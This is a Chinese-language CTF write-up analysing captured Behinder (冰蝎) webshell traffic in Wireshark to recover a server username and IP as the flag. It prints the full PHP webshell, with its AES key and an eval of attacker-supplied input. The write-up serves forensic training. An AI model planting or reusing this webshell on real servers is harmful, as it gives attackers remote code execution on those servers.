NewStarCTF-Week4-misc

3-溯源

题目提示是冰蝎流量

image-20231031183803734

在tcp的3579流找到了写入的木马,不过用base64加了密,所以去解密

image-20231031183844708

得到shell脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b";
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?

得到了aes的密钥e45e329feb5d925b,那就去解密相关流量

image-20231031184207513

在5722流找到了相关的回复数据,先用得到的密钥去aes解密

解密网站:http://tools.bugscaner.com/cryptoaes/

image-20231031184258405

得到msg,再用base64去解密

image-20231031184339217

得到了www-data,这是我们要找的服务器用户名,还要找ip

ip找了半个小时,然后借鉴了wp的方法

在wireshark过滤器中输入

1
http.response_for.uri contains "/1.php"

表示寻找http回应中含有1.php的响应包,其中可以找到密文

image-20231031191720227

这时候我就奇怪了,因为我之前记得之前是追踪过所有含有1.php的tcp流,这次我又追踪了第69932这条的tcp流

image-20231031191838091

image-20231031191906244

惊讶的发现响应包里呈现的尽然不是密文,我就想是不是要追踪http流,又试了一下追踪http流

image-20231031192045571

这回对了,看来tcp和http以后都要追踪一遍

最后解密

image-20231031192306239

flag{www-data_172.17.0.2}

#misc
NewStarCTF-Week4-misc
http://www.qetx.top/posts/46523/
作者
Qetx.Jul.27
发布于
2023年10月31日
许可协议